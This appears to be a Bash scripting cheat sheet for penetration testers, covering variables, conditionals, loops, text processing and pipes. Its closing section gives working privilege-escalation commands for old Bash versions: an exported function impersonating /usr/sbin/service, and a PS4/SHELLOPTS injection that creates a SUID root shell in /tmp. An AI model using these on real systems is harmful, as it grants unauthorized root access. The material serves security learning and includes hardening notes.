
Bash

alias

# Shortcuts: ".." moves up one directory, "ll" is a long listing that
# includes dotfiles. One alias call can define several names.
alias ..='cd ..' ll='ls -la'

shebang #!

#! /bin/bash

make script executable

# Set the execute bit on hack.sh. With no u/g/o prefix, "+x" applies to user,
# group and other, except for bits masked out by the umask; "chmod u+x"
# grants execute to the owner only.
chmod +x hack.sh

execute file

# The explicit ./ runs the script from the current directory. The shell only
# searches PATH for bare command names, and keeping "." out of PATH avoids
# running a same-named file that someone else placed in a shared directory.
./hack.sh

variables

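# Keep the address in one variable so later commands can reuse it.
TARGET=10.10.99.99
# Quote the expansion: unquoted, the value is word-split and glob-expanded
# before echo sees it.
echo "$TARGET"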

Arguments

#!/bin/bash
# Print the first two positional parameters; one that was not supplied
# expands to the empty string.
printf 'Arg-1 %s arg-2 %s\n' "$1" "$2"
Key Value
$0 The name of the Bash script
$1 - $9 The first 9 arguments to the Bash script
$# Number of arguments passed to the Bash script
$@ All arguments passed to the Bash script
$? The exit status of the most recently run process
$$ The process ID of the current script
$USER The username of the user running the script
$HOSTNAME The hostname of the machine
$RANDOM A pseudo-random integer from 0 to 32767 (predictable; do not use it for passwords, tokens or temp-file names)
$LINENO The current line number in the script

Assign arguments

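#!/bin/bash
# Ask for a name on stdin and echo it back.
echo "What is your name ?";
# -r stops read from treating backslashes in the input as escape characters.
read -r name;
echo "Your name is $name";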

Assign output

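#!/bin/bash
# Capture a command's stdout in a variable with $( ).
user=$(whoami)
# Quoted so the captured text is passed as a single word; the literal "kali"
# is printed after it as a second argument.
echo "$user" kali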

If / Else / Elif

If (string)

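#!/bin/bash
# Branch on a string typed by the user.
echo "Select scan XSS/SQLi";

# -r keeps backslashes in the reply literal.
read -r -p "Attack name:" action

# Quote the variable: with an empty or multi-word reply the unquoted form
# expands to a malformed test such as "[ == 'XSS' ]" and the comparison
# fails with a syntax error instead of evaluating to false.
if [[ "$action" == 'XSS' ]]; then
  echo "XSS attack...";
fi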

If (number)

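#!/bin/bash
# Compare a number typed by the user with 10.
echo "Number of request";

# -r keeps backslashes in the reply literal.
read -r -p "Nr:" action

# Accept only an optionally signed decimal integer before comparing. Empty or
# non-numeric input would otherwise make every test below error out. The check
# also matters if a comparison is later moved into [[ ]] or (( )), which
# evaluate their operands as arithmetic expressions.
if [[ "$action" =~ ^-?[0-9]+$ ]]; then
  if [ "$action" -lt 10 ]; then
    echo "< 10";
  fi

  if [ "$action" -eq 10 ]; then
    echo "== 10";
  fi

  if [ "$action" -gt 10 ]; then
    echo "> 10";
  fi
else
  echo "Not an integer: $action" >&2
fi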

If-Else

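#!/bin/bash
# Two-way branch on a number typed by the user.
echo "Number of request";
# -r keeps backslashes in the reply literal.
read -r -p "Nr:" action
# Validate first: empty or non-numeric input makes "-eq" fail with an error
# rather than evaluate to false, and user input should never reach a numeric
# comparison unchecked.
if [[ "$action" =~ ^-?[0-9]+$ ]]; then
  if [ "$action" -eq 10 ]; then
    echo "OK";
  else
    echo "No OK"
  fi
else
  echo "Not an integer: $action" >&2
fi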

If-ElseIf-Else

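#!/bin/bash
# Three-way branch on a number typed by the user.
echo "Number of request";
# -r keeps backslashes in the reply literal.
read -r -p "Nr:" action

# Validate first: empty or non-numeric input makes "-eq" fail with an error
# rather than evaluate to false, and user input should never reach a numeric
# comparison unchecked.
if [[ "$action" =~ ^-?[0-9]+$ ]]; then
  if [ "$action" -eq 10 ]; then
    echo "OK.1";
  elif [ "$action" -eq 20 ]; then
    echo "OK.2";
  else
    echo "No OK"
  fi
else
  echo "Not an integer: $action" >&2
fi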

Logical Operations

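# "&&" runs the right-hand side only when the left succeeds, "||" only when
# it fails.
# -q suppresses the matched line; "^kali:" anchors the match to the login-name
# field, so "kali" appearing elsewhere on a line (or inside a longer name)
# does not count as the user existing.
grep -q '^kali:' /etc/passwd && echo "User exist"
grep -q '^john:' /etc/passwd || echo "User NOT exist"
# Quote the command substitution so an empty or multi-word result cannot
# break the test.
[ "$(whoami)" = 'kali' ] && echo "Not root user"
[ "$(whoami)" = 'root' ] && echo "Root user"
# With "||" the message prints when the test is FALSE, so the test must be
# "is root" for the message to appear for non-root users.
# For a real privilege check compare "$(id -u)" with 0: the account name can
# differ, UID 0 is what carries the privilege.
[ "$(whoami)" = 'root' ] || echo "Ah NOT ROOT"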

For

#!/bin/bash
# Print 10.11.1.1 through 10.11.1.10, one address per line; the last octet
# comes from the external seq command.
for ip in $(seq 1 10)
do
  printf '10.11.1.%s\n' "$ip"
done
#!/bin/bash
# Same address list, using brace expansion instead of an external command.
for ip in {1..10}
do
  printf '%s\n' "10.11.1.${ip}"
done

While

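#!/bin/bash
# Print 10.10.10.1 through 10.10.10.5, one address per line.
index=1
while [ "$index" -le 5 ]; do
  # The dot separates the third octet from the counter; without it the
  # output is "10.10.101" rather than "10.10.10.1".
  echo "10.10.10.$index"
  # Variable names inside $(( )) need no "$".
  index=$(( index + 1 ))
done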

Function

#!/bin/bash
# banner: write the title line to stdout.
banner() {
  printf '%s\n' "Super HaCkEr Engine"
}

# A function is invoked like any other command; call it twice.
banner
banner

sed

# Replace the first "Cat" on each input line with "Robot"; the text is fed
# to sed through a here-string.
sed -e 's/Cat/Robot/' <<< "I am Mr.Cat"

cut

# Keep comma-separated fields 1, 3 and 5 of the input line.
cut -d ',' -f 1,3,5 <<< "root,lorem,password123,ipsum,/root"
# root,password123,/root

awk

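# awk opens the file itself, so no cat is needed. Fields are split on ":";
# field 1 is the login name and field 6 the home directory.
awk -F: '{printf "USER--> %s\t HOME--> %s\n", $1, $6}' /etc/passwd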

piping

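# Step by step: grep selects the lines containing /bin/false, cut keeps the
# login name and home directory (fields 1 and 6), awk formats the two fields
# that remain. grep reads the file directly, so no cat is needed.
grep '/bin/false' /etc/passwd | cut -d":" -f 1,6 | awk -F: '{printf "user: %s home:%s\n", $1, $2}'
# The same result from a single awk: the /.../ pattern does the selection and
# the original field numbers are used directly.
awk -F: '/\/bin\/false/ {printf "user: %s home:%s\n", $1, $6}' /etc/passwd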

compare

diff
vimdiff
comm

download

wget
curl
axel

filter out some stuff

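# Drop static-asset hits from the scan output. The dot is escaped and the
# extension must end the path (followed by "?", whitespace or end of line).
# The bare pattern '.js' also matches ".json", ".jsp" or any "xjs", and '.md'
# matches "/cmd", so real findings were silently filtered out of the results.
grep -v -E '\.(js|css|gif|svg|png|jpg|ttf|eot|woff2?|md)([?[:space:]]|$)' feroxbuster_80.txt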

split by whitespace, take the 6th field, sort, uniq, filter

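# Take the 6th whitespace-separated field of each line, de-duplicate it
# (sort -u replaces sort | uniq), then drop static assets.
# The dot is escaped and the extension must end the path; the bare pattern
# '.js' also matches ".json" and ".jsp", and '.md' matches "/cmd", which hides
# real findings.
awk '{print $6}' feroxbuster_80.txt \
  | sort -u \
  | grep -v -E '\.(js|css|gif|svg|png|jpg|ttf|eot|woff2?|md)([?[:space:]]|$)'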

wipe all whitespace including newlines from file

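# Delete every space, tab, newline and carriage return. tr only reads stdin,
# so redirect the file into it instead of piping it through cat.
tr -d ' \t\n\r' < file.txt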

Bash bugs

Bug in bash < 4.2-048

In Bash versions <4.2-048 it is possible to define shell functions with names that resemble file paths, then export those functions so that they are used instead of any actual executable at that file path.

# Print the installed Bash version to compare against the affected range.
/bin/bash --version
# Define a function whose name is the absolute path /usr/sbin/service. Its
# body starts bash with -p, which keeps the effective UID instead of
# resetting it to the real UID.
function /usr/sbin/service { /bin/bash -p; }
# Export the function so child processes receive it through the environment.
# Hardening: keep Bash patched, and have privileged (SUID) programs start
# helpers with execve() and a cleaned environment rather than through a shell.
export -f /usr/sbin/service

If a binary runs, for example, /usr/sbin/service apache2 start, the exported function is called in place of the real executable, so our code is executed.

Bash versions < 4.4

When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debugging statements.

Run the /usr/local/bin/suid-env2 executable with bash debugging enabled and the PS4 variable set to an embedded command which creates an SUID version of /bin/bash:

# env -i starts the program with an empty environment plus the two variables
# given. SHELLOPTS=xtrace turns on tracing in a bash that inherits it, and
# bash expands PS4 before each traced command, so the $( ) inside it runs.
# Presumably suid-env2 runs a command through bash; confirm for the binary.
# Hardening: run a Bash outside the affected range stated above, keep SUID
# programs from invoking a shell with a caller-controlled environment, and
# mount /tmp with nosuid so a SUID file placed there has no effect.
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2

Run the /tmp/rootbash executable with -p to gain a shell running with root privileges:

# -p keeps the effective UID that the SUID bit provides. For defenders, a
# SUID shell binary under /tmp is a clear sign of compromise; a periodic
# "find / -xdev -perm -4000 -type f" audit will surface it.
/tmp/rootbash -p